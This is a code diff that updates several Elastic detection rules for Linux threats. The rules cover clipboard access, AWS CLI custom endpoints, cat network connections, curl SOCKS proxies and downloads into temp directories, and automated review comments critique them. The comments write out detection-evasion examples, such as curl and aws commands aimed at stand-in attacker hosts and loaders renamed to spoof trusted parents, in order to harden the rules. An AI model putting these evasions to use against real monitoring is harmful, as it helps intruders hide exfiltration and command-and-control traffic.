diff --git a/rules/linux/collection_linux_clipboard_activity.toml b/rules/linux/collection_linux_clipboard_activity.toml index a647398f892..8405123d085 100644 --- a/rules/linux/collection_linux_clipboard_activity.toml +++ b/rules/linux/collection_linux_clipboard_activity.toml @@ -1,18 +1,24 @@ [metadata] creation_date = "2023/07/27" -integration = ["endpoint", "auditd_manager"] +integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2025/09/16" [rule] author = ["Elastic"] description = """ -This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group -leader. Adversaries may collect data stored in the clipboard from users copying information within or between -applications. +This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process parent. +Adversaries may collect data stored in the clipboard from users copying information within or between applications. """ from = "now-9m" -index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_manager.auditd-*"] +index = [ + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*", + ] language = "kuery" license = "Elastic License v2" name = "Linux Clipboard Activity Detected" @@ -27,6 +33,8 @@ tags = [ "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", "Resources: Investigation Guide", ] timestamp_override = "event.ingested" 
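Review bot: Adding `logs-crowdstrike.fdr*` and `logs-sentinel_one_cloud_funnel.*` to `index` only buys coverage if this rule's query, which is not in the hunk, admits those sources' process-start `event.action` values; the AWS CLI rule in the same change spells that out as `event.action:("exec" or "exec_event" or "executed" or "process_started")`, and this rule should be checked for the equivalent filter. The new-terms field introduced further down, `process.parent.executable`, must also be populated by both new integrations, since a new-terms rule evaluated over an absent field matches nothing and fails silently rather than loudly. Narrowing `logs-endpoint.events.*` to `logs-endpoint.events.process*` is a welcome tightening that keeps file and network events out of the baseline.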
@@ -88,7 +96,7 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" -value = ["host.id", "process.group_leader.executable"] +value = ["host.id", "process.parent.executable"] [[rule.new_terms.history_window_start]] field = "history_window_start" diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index 06eacbf8b12..34a66025f8a 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml 
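Review bot: Switching the new-terms field from `process.group_leader.executable` to `process.parent.executable` resets the learned baseline: every (host.id, parent executable) pair is unseen within the history window after deployment, so expect a burst of alerts until the window refills, which deserves a line in the rule note or the PR description. On the newly added sources, confirm that `process.parent.executable` is actually mapped; if an integration only carries the parent's base name, the new-terms evaluation never sees a value for those events and the rule is silently dead for that source. If that is the case, `process.parent.name` is the field such sources do carry, at the cost of being trivially spoofable by an attacker who names their loader `bash`. The `history_window_start` value for this rule is outside the hunk.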
@@ -1,16 +1,27 @@ [metadata] creation_date = "2024/08/21" -integration = ["endpoint"] +integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2025/09/16" [rule] author = ["Elastic"] description = """ -Detects the use of the AWS CLI with the `--endpoint-url` argument, which allows users to specify a custom endpoint URL for AWS services. This can be leveraged by adversaries to redirect API requests to non-standard or malicious endpoints, potentially bypassing typical security controls and logging mechanisms. This behavior may indicate an attempt to interact with unauthorized or compromised infrastructure, exfiltrate data, or perform other malicious activities under the guise of legitimate AWS operations. +Detects the use of the AWS CLI with the "--endpoint-url" argument, which allows users to specify a custom endpoint URL +for AWS services. This can be leveraged by adversaries to redirect API requests to non-standard or malicious endpoints, +potentially bypassing typical security controls and logging mechanisms. This behavior may indicate an attempt to interact +with unauthorized or compromised infrastructure, exfiltrate data, or perform other malicious activities under the guise +of legitimate AWS operations. """ from = "now-9m" -index = ["logs-endpoint.events.process-*"] +index = [ + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*", + ] language = "kuery" license = "Elastic License v2" name = "AWS CLI Command with Custom Endpoint URL" 
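Review bot: The description presents the `--endpoint-url` argument as the way to redirect API calls, but the AWS CLI also honors the `AWS_ENDPOINT_URL` / `AWS_ENDPOINT_URL_<SERVICE>` environment variables and the `endpoint_url` setting in `~/.aws/config`, none of which this rule can see, so an adversary who knows the rule simply sets the variable instead. Worth a caveat sentence at the end of the description: `Note: the CLI also accepts the endpoint via the AWS_ENDPOINT_URL environment variable or the endpoint_url config setting; those paths are not covered by this rule.` The curl SOCKS rule in this same change already uses `process.env_vars` with a setup guide for environment capture, so the same approach could extend this rule later. Adding `auditbeat-*` and `logs-auditd_manager.auditd-*` also means `process.args` tokenization may differ by source; verify that auditd-derived events split the argument into the same exact token before relying on the keyword match.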
@@ -21,17 +32,23 @@ risk_score = 47 rule_id = "349276c0-5fcf-11ef-b1a9-f661ea17fbce" severity = "medium" tags = [ - "Data Source: Elastic Defend", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", ] type = "new_terms" timestamp_override = "event.ingested" query = ''' -host.os.type: "linux" and event.category: "process" and process.name: "aws" and process.args: "--endpoint-url" +host.os.type:"linux" and event.category:"process" and +event.action:("exec" or "exec_event" or "executed" or "process_started") and +process.name:"aws" and process.args:"--endpoint-url" ''' note = """## Triage and analysis @@ -71,21 +88,21 @@ The AWS CLI allows users to interact with AWS services via command-line, offerin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" -value = ["user.name"] +value = ["host.id"] + [[rule.new_terms.history_window_start]] field = "history_window_start" -value = "now-10d" +value = "now-3d" diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index e0ce29eee9d..cab972324d4 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2025/09/16" [transform] [[transform.osquery]] 
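Review bot: The new query still matches only the bare `--endpoint-url` token, so the single-argument spelling `aws s3 ls --endpoint-url=https://attacker.example`, which the CLI's argparse-style option parser accepts, goes undetected; widen the last clause to `process.args:("--endpoint-url" or --endpoint-url=*)`. The added `event.action` filter is the right companion to the new index patterns, and since the match is an exact keyword term it stays case-sensitive, which is correct for the CLI but worth a `#` comment above `query` so nobody later "helps" with a case-insensitive form. The remainder of the `[rule]` table, including the note, continues outside the hunk.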
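Review bot: Keying new-terms on `host.id` alone means any legitimate use on a host, such as a CI job pointing the CLI at a local MinIO or LocalStack endpoint, suppresses alerts for every other user on that host for the next three days, which is exactly the window an attacker with a foothold on that box benefits from. Keeping the user dimension, `value = ["host.id", "user.name"]`, preserves the per-host baseline while still firing when a different account starts doing it. Shrinking the window from 10d to 3d also means weekly scheduled jobs re-alert on every run; if that is intended, a short `#` comment above `history_window_start` saying so would stop the next reader from "fixing" it.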
@@ -29,7 +29,6 @@ query = "SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.u label = "Osquery - Retrieve Process Info" query = "SELECT name, cmdline, parent, path, uid FROM processes" - [rule] author = ["Elastic"] description = """ @@ -138,23 +137,22 @@ tags = [ "Resources: Investigation Guide", ] type = "eql" - query = ''' -sequence by host.id, process.entity_id with maxspan=1s +sequence by host.id, process.entity_id with maxspan=3s [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "cat" and process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and - process.name == "cat" and not (destination.ip == null or destination.ip == "0.0.0.0" or cidrmatch( - destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", - "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", - "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", - "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", - "FF00::/8" + process.name == "cat" and not ( + destination.ip == null or destination.ip == "0.0.0.0" or cidrmatch( + destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", + "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", + "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", + "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", + "FF00::/8" ) )] ''' - [[rule.threat]] framework = "MITRE ATT&CK" 
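Review bot: The private-address exclusion list in the network stage covers the IPv4 RFC 1918 ranges, `::1`, `FE80::/10` and `FF00::/8`, but not IPv6 unique local addresses, so a connection to an internal `fd00::/8` host is treated as external while the same host reached over `10.0.0.0/8` is ignored; add `"fc00::/7"` to the `cidrmatch` list for parity. The only behavioural change in the hunk is the `maxspan` bump from 1s to 3s, which is undocumented; a `#` comment above `query` stating the observed exec-to-connect latency that motivated it would keep it from being tightened again. The `[[rule.threat]]` entries following the query continue outside the hunk.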
@@ -162,6 +160,7 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -169,6 +168,7 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -176,4 +176,3 @@ framework = "MITRE ATT&CK" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index 6fc18eaaca8..cfdde4aab58 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,13 +2,13 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2025/09/16" [rule] author = ["Elastic"] description = """ -This rule detects the use of the `curl` command-line tool with SOCKS proxy options, launched from an unusual parent -process. Attackers may use `curl` to establish a SOCKS proxy connection to bypass network restrictions and exfiltrate +This rule detects the use of the "curl" command-line tool with SOCKS proxy options, launched from an unusual parent +process. Attackers may use "curl" to establish a SOCKS proxy connection to bypass network restrictions and exfiltrate data or communicate with C2 servers. """ from = "now-9m" @@ -16,7 +16,7 @@ index = ["logs-endpoint.events.process*"] language = "eql" license = "Elastic License v2" name = "Curl SOCKS Proxy Activity from Unusual Parent" -risk_score = 21 +risk_score = 47 rule_id = "734239fe-eda8-48c0-bca8-9e3dafd81a88" setup = """## Setup 
@@ -56,7 +56,7 @@ In order to capture this behavior, this rule requires a specific configuration o After saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly. For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ -severity = "low" +severity = "medium" tags = [ "Domain: Endpoint", "OS: Linux", @@ -71,13 +71,18 @@ query = ''' process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "curl" and ( process.parent.executable like ( - "/dev/shm/*", "/tmp/*", "/var/tmp/*", "/var/run/*", "/root/*", "/boot/*", "/var/www/html/*", "/opt/.*" + "/dev/shm/*", "/tmp/*", "/var/tmp/*", "/var/run/*", "/root/*", "/boot/*", "/var/www/*", "/opt/.*", + "/home/*" ) or - process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") or + process.parent.name like ".*" ) and ( process.args like ("--socks5-hostname", "--proxy", "--preproxy", "socks5*") or process.args == "-x" or - process.env_vars like ("http_proxy=socks5h://*", "HTTPS_PROXY=socks5h://*", "ALL_PROXY=socks5h://*") + process.env_vars like~ ("http_proxy=socks5h://*", "HTTPS_PROXY=socks5h://*", "ALL_PROXY=socks5h://*") +) and not ( + process.parent.args == "/opt/rudder/share/commands/agent-run" or + process.args == "http://localhost:8080/rudder/api/status" ) ''' note = """## Triage and analysis diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index 8b5187ecb2b..8e5b77e396f 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml 
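Review bot: The new Rudder exclusion `process.args == "http://localhost:8080/rudder/api/status"` is keyed on a value the launching user controls: curl accepts several URLs per invocation, so `curl -x socks5h://attacker:1080 http://c2.example/ http://localhost:8080/rudder/api/status` sails through the rule from any of the broadened parents. Anchor it to the agent instead, e.g. `(process.parent.executable like "/opt/rudder/*" and process.args == "http://localhost:8080/rudder/api/status")`, or drop the URL branch and keep only the `agent-run` parent test. Separately, the `process.env_vars` patterns only match `socks5h://`, while the argument branch matches `socks5*`; `ALL_PROXY=socks5://...` or `socks4a://...` set through the environment is missed, so `"http_proxy=socks*"`, `"HTTPS_PROXY=socks*"`, `"ALL_PROXY=socks*"` would be consistent (the `like~` already makes the variable names case-insensitive). With `/home/*` and shell parents now in scope and severity raised to medium, check alert volume before merging.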
@@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/07" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -12,7 +12,7 @@ the creation of files in suspicious directories such as /tmp, /var/tmp, or /dev/ attempt to download a payload, exploit or tool. """ from = "now-9m" -index = ["logs-endpoint.events.*"] +index = ["logs-endpoint.events.process*", "logs-endpoint.events.file*"] language = "eql" license = "Elastic License v2" name = "Git Repository or File Download to Suspicious Directory" @@ -106,6 +106,9 @@ sequence by process.entity_id, host.id with maxspan=10s [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( (process.name == "git" and process.args == "clone") or (process.name in ("wget", "curl") and process.command_line like~ "*github*") + ) and not ( + process.parent.name in ("git", "cmake") or + process.parent.args like "/root/.ansible/tmp/ansible*" )] [file where host.os.type == "linux" and event.type == "creation" and file.path like ("/tmp/*", "/var/tmp/*", "/dev/shm/*")] '''
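Review bot: The two new exclusions trust attacker-controllable attributes: `process.parent.name in ("git", "cmake")` matches on basename only, so a loader copied to `/tmp/git` that runs `curl https://github.com/...` is exempt, and `process.parent.args like "/root/.ansible/tmp/ansible*"` exempts any parent that merely carries such a string as an argument. Pin the parent by path where the paths are known, e.g. `process.parent.executable like ("/usr/bin/git", "/usr/lib/git-core/*", "/usr/bin/cmake")`, and scope the Ansible case to its interpreter, e.g. `process.parent.name like "python*" and process.parent.args like "/root/.ansible/tmp/ansible*"`. The exclusions sit inside the first stage of the `sequence`, whose leading `sequence by` line is the hunk header context rather than part of the hunk.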